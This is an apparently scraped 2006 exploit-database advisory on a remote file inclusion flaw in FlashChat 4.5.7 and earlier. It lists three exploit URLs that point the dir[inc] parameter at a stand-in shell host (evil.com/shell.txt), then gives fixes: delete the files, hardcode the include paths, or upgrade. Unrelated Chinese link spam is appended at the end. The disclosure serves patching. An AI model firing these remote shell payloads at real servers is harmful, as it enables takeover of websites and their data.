php flash chat,FlashChat lt;= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability
NeXtMaN <mc.nadz [at] gmail.com>
Here are 3 RFI vulnerabilities in Flashchat i've found:
Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?
video here:
Code:
http://rapidshare.de/files/31362430/Flashchat.rar.html
EDIT: Solution:
It looks like the vulnerable files are there in case you want to integrate with another script. The script that would require these files is AEDating:
you simply delete the following files and you will be secure:
/inc/cmses/aedating4CMS.php
/inc/cmses/aedatingCMS.php
/inc/cmses/aedatingCMS2.php
if your flashchat is integrated with AEDating and/or you dont want to delete the files you can just edit the 3 files to use your path like this:
Replace this:
$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]admin.inc.php" );
With this:
$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "[Your AED path]/db.inc.php" );
require_once( "[Your AED path]/admin.inc.php" );
Alternatively you could just upgrade to 4.6.2 (just released)
PS, all 3 of those files are vulnerable and will need editing.
# milw0rm.com [2006-09-04]
php flash chat,FlashChat lt;= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability相关推荐
- BlackArch-Tools
BlackArch-Tools 简介安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 B ...
- arm7 mysql 编译安装_uboot的readme导读(转)
UBOOT的移植其实并没有想象中的难,这主要归功于众多的工程师已经将常见的平台代码写入了UBOOT,我们所要做的就是一点小小的更改,在网上看了很多相关的移植,也听到有人说其实看了UBOOT的readm ...
- uboot的readme导读(转)
uboot的readme导读(转) UBOOT的移植其实并没有想象中的难,这主要归功于众多的工程师已经将常见的平台代码写入了UBOOT,我们所要做的就是一点小小的更改,在网上看了很多相关的移植,也 ...
- Atmel at91rm9200的armlinux的bootloader启动代码分析
<script type=text/javascript> </script> <script src="http://pagead2.googlesyndic ...
- uboot readme
前面是 Uboot 的发展,下载地址,如何获得帮助,以及版本说明 Directory Hierarchy: 目录层次 ==================== - board Boa ...
- 安全测试常用几个工具(开源商业)调研
下面介绍了这些工具的主要功能以及教程.书籍.视频等. 端口扫描器:Nmap Nmap是"Network Mapper"的缩写,众所周知,它是一款非常受欢迎的免费开源黑客工具.Nma ...
- kaliWEB渗透笔记
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢. 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址. WEB攻击面 Network.OS.WEB Server ...
- ria开发_使用Adobe Flash Platform构建RIA
ria开发 The Flash that you thought you knew has changed. It's grown up. 您以为自己知道的Flash已更改. 长大了 In this ...
- STM32F4 HAL库开发 -- SPI Flash
一.驱动 bsp_spi_flash.c #include "THC_Board_include_h.h"/* Private define ------------------- ...
最新文章
- Learn OpenGL (十二):投光物
- 数据库中间件 MyCAT源码分析:【单库单表】插入【推荐阅读】
- LiveGBS无插件播放页面的集成----单独的播放器样式
- (chap1 网络基础知识)网络的构成要素:(3)交换机
- 从数据类型 nvarchar 转换为 numeric 时出错_Python数据分析类库系列Numpy之ndarray的数据类型...
- C++原子操作 atomic的使用及效率
- 《React Native 精解与实战》书籍连载「React Native 网络请求与列表绑定」
- PVS 6.1 Configuring Services Failed
- Linux之Ubuntu安装搜狗输入法
- python编程入门-python编程入门(第3版)
- python中装饰器的作用_Python中装饰器的用法
- Android中ListView复用导致布局错乱的解决方案
- 竞品分析2020——铁路售票系统
- 操作系统概念第六章部分作业题答案
- JAVA:实现HillCipher希尔密码算法(附完整源码)
- 斗地主系列之牌型大小比较
- 三防数据存储: 3U Open VPX 存储模块
- 族蚂网针对宠物网站建设有哪些新体验
- 计算机网络ip地址划分方法,ip地址怎么划分 ip地址划分方法【图文】
- java丶对数组值按首字母进行排序
热门文章
- 网站服务器令牌获取,adobe - 获取Adobe Sign访问令牌以进行服务器到服务器身份验证 - 堆栈内存溢出...
- html5支持多线程,html5 多线程
- 中科院博士整理的机器学习算法知识手册,完整 PDF 开放下载!
- 跟小伙伴们做了个高效刷论文的小站
- 拒绝无脑试错:写给萌新的“科学炼丹”入门手册
- 「小公式」平均数与级数
- 写给我的女神,一个用灵魂歌唱的小精灵
- 如何使用ListView实现一个带有网络请求,解析,分页,缓存的公共的List页面来大大的提高工作效率
- 【HTML/CSS】HTML5和CSS3的新特性
- 知识图谱常用指标:MRR、Hits@1、Hits@10、MR